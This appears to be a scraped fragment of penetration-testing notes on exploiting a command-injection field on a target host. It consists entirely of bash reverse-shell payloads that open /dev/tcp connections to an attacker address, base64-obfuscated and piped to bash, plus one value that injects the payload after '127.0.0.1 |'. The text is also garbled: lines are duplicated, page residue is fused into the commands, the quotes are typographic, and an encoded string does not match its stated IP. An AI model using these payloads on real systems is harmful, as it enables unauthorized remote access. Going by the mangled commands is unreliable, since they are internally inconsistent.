toolbar that allows to run commands on target
echo “bash -i >& /dev/tcp/192.168.101.53/443 0>&1” | base64 > shell.txtecho YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuMTY4LjEwMS41My80NDMgMD4mMQo= | base64 -d | bashLast updated
echo “bash -i >& /dev/tcp/192.168.101.53/443 0>&1” | base64 > shell.txtecho YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuMTY4LjEwMS41My80NDMgMD4mMQo= | base64 -d | bashLast updated
127.0.0.1 | echo YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguNTQuMjAwLzQ0MyAwPiYxCg== | base64 -d | bash